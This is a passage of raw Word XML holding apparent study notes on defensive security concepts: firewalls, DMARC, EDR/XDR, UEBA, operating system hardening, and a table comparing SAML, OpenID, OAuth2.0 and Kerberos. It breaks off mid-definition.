        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DCDB55C" w14:textId="56CE1693" w:rsidR="00F00624" w:rsidRPr="005B4891" w:rsidRDefault="000C2A4E" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="7597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Existing protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00721C96" w:rsidRPr="005B4891" w14:paraId="7FF2DBE2" w14:textId="77777777" w:rsidTr="00F00624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CCDBF4E" w14:textId="7E419D0C" w:rsidR="00721C96" w:rsidRPr="005B4891" w:rsidRDefault="00721C96" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="7597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Verbosity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C310752" w14:textId="16CB3871" w:rsidR="00721C96" w:rsidRPr="005B4891" w:rsidRDefault="00721C96" w:rsidP="00520960">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="7597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4891">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Can be limiting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="373986E5" w14:textId="77777777" w:rsidR="00913E3B" w:rsidRPr="005B4891" w:rsidRDefault="00913E3B" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B2AD27" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2C930E" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A43C6B" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1837AD18" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A4CED54" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4D063B" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F2CDF39" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732E6F40" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16510412" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23502E67" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C766CE4" w14:textId="77777777" w:rsidR="000B08B4" w:rsidRPr="005B4891" w:rsidRDefault="000B08B4" w:rsidP="00F25B3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7597"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402D8BD5" w14:textId="693809AB" w:rsidR="006C4286" w:rsidRPr="00A05553" w:rsidRDefault="006C4286" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc198019372"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Firewall</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="49F5A714" w14:textId="7B0473EF" w:rsidR="00913E3B" w:rsidRPr="005B4891" w:rsidRDefault="00913E3B" w:rsidP="00913E3B">
      <w:r w:rsidRPr="005B4891">
        <w:t>Inbound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B98355" w14:textId="18856DDD" w:rsidR="00E82478" w:rsidRPr="005B4891" w:rsidRDefault="00E82478" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51D46A16" wp14:editId="00BBC4B6">
            <wp:extent cx="3378200" cy="1858904"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="49897440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744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7692" cy="187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2529" w14:textId="797CE184" w:rsidR="00913E3B" w:rsidRPr="005B4891" w:rsidRDefault="00913E3B" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Outbound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4322CA4E" w14:textId="3166A38F" w:rsidR="00166BEF" w:rsidRPr="005B4891" w:rsidRDefault="00913E3B" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339893BB" wp14:editId="410894C0">
            <wp:extent cx="3351299" cy="1574800"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
            <wp:docPr id="46973527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352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2169" cy="15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4ACF" w14:textId="137B0B13" w:rsidR="00425AD7" w:rsidRPr="005B4891" w:rsidRDefault="0056691B" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>DMARC</w:t>
      </w:r>
      <w:r w:rsidR="008D2597" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> = Domain based message and Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18774091" w14:textId="6F9DCED5" w:rsidR="0011645C" w:rsidRPr="005B4891" w:rsidRDefault="009D314A" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Endpoint Detection and Response</w:t>
      </w:r>
      <w:r w:rsidR="003911DE" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> (EDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65502714" w14:textId="1E2F7EC2" w:rsidR="00C239DC" w:rsidRPr="005B4891" w:rsidRDefault="00C239DC" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B18A59" w14:textId="191626C3" w:rsidR="00805BFD" w:rsidRPr="005B4891" w:rsidRDefault="00805BFD" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Raspberry pi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D626B6" w14:textId="5F01003B" w:rsidR="00805BFD" w:rsidRPr="005B4891" w:rsidRDefault="00805BFD" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>IoT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6353EAFF" w14:textId="77777777" w:rsidR="002339F2" w:rsidRPr="005B4891" w:rsidRDefault="00C239DC" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F64164D" wp14:editId="45C0F518">
            <wp:extent cx="3909849" cy="2772062"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1529465536" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, desig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65536" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, design&#10;&#10;KI-generert innhold kan være feil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7634" cy="277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8204" w14:textId="599279B5" w:rsidR="00924EC4" w:rsidRPr="005B4891" w:rsidRDefault="002D24BB" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Allows us to do detection of suspicious activity on </w:t>
      </w:r>
      <w:r w:rsidR="00924EC4" w:rsidRPr="005B4891">
        <w:t>endpoint devices like for example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEE5A5E" w14:textId="6691A1EC" w:rsidR="00924EC4" w:rsidRPr="005B4891" w:rsidRDefault="00924EC4" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Unauthorized processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502D4FC1" w14:textId="4357FB9B" w:rsidR="00924EC4" w:rsidRPr="005B4891" w:rsidRDefault="00924EC4" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Unauthorized data access &amp; modifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0A34A8" w14:textId="5D0A78D7" w:rsidR="00924EC4" w:rsidRPr="005B4891" w:rsidRDefault="00924EC4" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Unauthorized OS &amp; app configuration changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9524A7" w14:textId="43A43EC1" w:rsidR="00924EC4" w:rsidRPr="005B4891" w:rsidRDefault="00924EC4" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Missing Firmware updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D87E06" w14:textId="27BCA9A7" w:rsidR="00924EC4" w:rsidRPr="005B4891" w:rsidRDefault="00924EC4" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Mission OS security patches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B221C8" w14:textId="5D62F14C" w:rsidR="00924EC4" w:rsidRPr="005B4891" w:rsidRDefault="00924EC4" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Signature &amp; definition updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C29EB7" w14:textId="77777777" w:rsidR="001934C4" w:rsidRPr="005B4891" w:rsidRDefault="001934C4" w:rsidP="00E82478"/>
    <w:p w14:paraId="1D137E31" w14:textId="17E486EA" w:rsidR="006C71D9" w:rsidRPr="005B4891" w:rsidRDefault="006C71D9" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">Extended detection and </w:t>
      </w:r>
      <w:r w:rsidR="008F6B90" w:rsidRPr="005B4891">
        <w:t>response (XDR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEFF27" w14:textId="350CBBFC" w:rsidR="001934C4" w:rsidRPr="005B4891" w:rsidRDefault="001934C4" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44947BD4" wp14:editId="79099284">
            <wp:extent cx="4114800" cy="1890939"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="174241103" name="Bilde 1" descr="Et bilde som inneholder tekst, Font, diagram, li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1103" name="Bilde 1" descr="Et bilde som inneholder tekst, Font, diagram, line&#10;&#10;KI-generert innhold kan være feil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2186" cy="189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5655" w14:textId="77CDF623" w:rsidR="00952BE5" w:rsidRPr="005B4891" w:rsidRDefault="00854024" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>UEBA = User</w:t>
      </w:r>
      <w:r w:rsidR="008976D0" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> and Entity Behavior Analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E539CB" w14:textId="77777777" w:rsidR="00B8391B" w:rsidRPr="005B4891" w:rsidRDefault="00B8391B" w:rsidP="00E82478"/>
    <w:p w14:paraId="2D3ABD15" w14:textId="77777777" w:rsidR="00C7377F" w:rsidRPr="005B4891" w:rsidRDefault="00C7377F" w:rsidP="00E82478"/>
    <w:p w14:paraId="2AD58389" w14:textId="7C01E79B" w:rsidR="00776D5F" w:rsidRPr="00A05553" w:rsidRDefault="00776D5F" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc198019373"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Operating system security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="66C3DB5B" w14:textId="0B25D8C7" w:rsidR="00776D5F" w:rsidRPr="005B4891" w:rsidRDefault="00776D5F" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Physical Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDE61E" w14:textId="2DA12393" w:rsidR="00776D5F" w:rsidRPr="005B4891" w:rsidRDefault="00776D5F" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Group Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5DF5E1" w14:textId="1AF64530" w:rsidR="00776D5F" w:rsidRPr="005B4891" w:rsidRDefault="002F70EF" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Strong authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607736AC" w14:textId="4CA3EB43" w:rsidR="002F70EF" w:rsidRPr="005B4891" w:rsidRDefault="000905D1" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Host-based security (</w:t>
      </w:r>
      <w:r w:rsidR="00350A23" w:rsidRPr="005B4891">
        <w:t xml:space="preserve">client sided, host-based firewall, </w:t>
      </w:r>
      <w:r w:rsidR="003A4851" w:rsidRPr="005B4891">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="00350A23" w:rsidRPr="005B4891">
        <w:t>example: laptop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C1527" w14:textId="61963B53" w:rsidR="00E40EBC" w:rsidRPr="005B4891" w:rsidRDefault="00E40EBC" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>File access &amp; integrity technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082601E0" w14:textId="77777777" w:rsidR="00C56531" w:rsidRPr="005B4891" w:rsidRDefault="00C56531" w:rsidP="00E82478"/>
    <w:p w14:paraId="287842F1" w14:textId="77777777" w:rsidR="0028669C" w:rsidRPr="005B4891" w:rsidRDefault="00774900" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23599349" wp14:editId="4AD0156D">
            <wp:extent cx="2315402" cy="2601311"/>
            <wp:effectExtent l="0" t="0" r="8890" b="8890"/>
            <wp:docPr id="189969933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993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5678" cy="261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D50" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34A806" w14:textId="41E9268A" w:rsidR="00C56531" w:rsidRPr="005B4891" w:rsidRDefault="00596D50" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52554C0F" wp14:editId="4F158311">
            <wp:extent cx="3269884" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6350"/>
            <wp:docPr id="48270499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049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0180" cy="27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2D8F" w14:textId="42D3B8A7" w:rsidR="003F15F6" w:rsidRPr="005B4891" w:rsidRDefault="003F15F6" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Example of internal IdP is local active directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24473B" w14:textId="7D9B6F02" w:rsidR="00124E44" w:rsidRPr="005B4891" w:rsidRDefault="00921C74" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>Examples</w:t>
      </w:r>
      <w:r w:rsidR="00B942B5" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> of external IdP </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00B942B5" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> Microsoft</w:t>
      </w:r>
      <w:r w:rsidR="00B7461B" w:rsidRPr="005B4891">
        <w:t>, Google</w:t>
      </w:r>
      <w:r w:rsidR="00373FED" w:rsidRPr="005B4891">
        <w:t>, Twitter,</w:t>
      </w:r>
      <w:r w:rsidR="00B7461B" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> etc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A1EAB" w:rsidRPr="005B4891" w14:paraId="29288E49" w14:textId="77777777" w:rsidTr="009A1EAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57BB621B" w14:textId="59804F39" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="0052096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B4891">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SAML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AAF7B60" w14:textId="1AAA858F" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="0052096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B4891">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OpenID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="491CFC59" w14:textId="13E3D981" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="0052096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B4891">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OAuth2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7809C070" w14:textId="13DC899C" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="0052096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B4891">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kerberos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A1EAB" w:rsidRPr="005B4891" w14:paraId="0EC5C8B8" w14:textId="77777777" w:rsidTr="009A1EAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13E75B44" w14:textId="1415FE1B" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="005B4891">
              <w:t>Authentication &amp; authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2DA503E4" w14:textId="505A3C3F" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="005B4891">
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2E93008B" w14:textId="77759D39" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="005B4891">
              <w:t>Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5888AF9C" w14:textId="66DA59FB" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="005B4891">
              <w:t>Network authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009A1EAB" w:rsidRPr="005B4891" w14:paraId="25E0B146" w14:textId="77777777" w:rsidTr="009A1EAB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54B1F48A" w14:textId="39238C20" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="005B4891">
              <w:t>XML-format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2265" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="49FF26BA" w14:textId="7218D092" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="005B4891">
              <w:t>ID tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C7D8A2E" w14:textId="7777BF2E" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="005B4891">
              <w:t>OAuth tokens</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2266" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="572AF408" w14:textId="62690E36" w:rsidR="009A1EAB" w:rsidRPr="005B4891" w:rsidRDefault="009A1EAB" w:rsidP="00520960">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="005B4891">
              <w:t>TGTs &amp; Session tickets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="155B42F2" w14:textId="76EBF5D2" w:rsidR="00074EDF" w:rsidRPr="005B4891" w:rsidRDefault="00074EDF" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>SSO = Single sign on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B74677" w14:textId="7D3FD855" w:rsidR="00124E44" w:rsidRPr="005B4891" w:rsidRDefault="00250F6D" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">SAML = </w:t>
      </w:r>
      <w:r w:rsidR="00FA5FF4" w:rsidRPr="005B4891">
        <w:t>Security assertion and Markup language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9D61F3" w14:textId="644CD341" w:rsidR="007B50D7" w:rsidRPr="005B4891" w:rsidRDefault="007B50D7" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>OpenID = Authentication part</w:t>
      </w:r>
      <w:r w:rsidR="00EA4118" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> (OpenID ID token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18153F78" w14:textId="2ED67D84" w:rsidR="002339F2" w:rsidRPr="005B4891" w:rsidRDefault="00E42BE0" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00AC4392" w:rsidRPr="005B4891">
        <w:t>Auth = Authorization framework</w:t>
      </w:r>
      <w:r w:rsidR="002C156F" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> (NOT AUTHENTICATION)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3382068B" w14:textId="185673A3" w:rsidR="00EA4118" w:rsidRPr="005B4891" w:rsidRDefault="00EA4118" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">Kerberos = </w:t>
      </w:r>
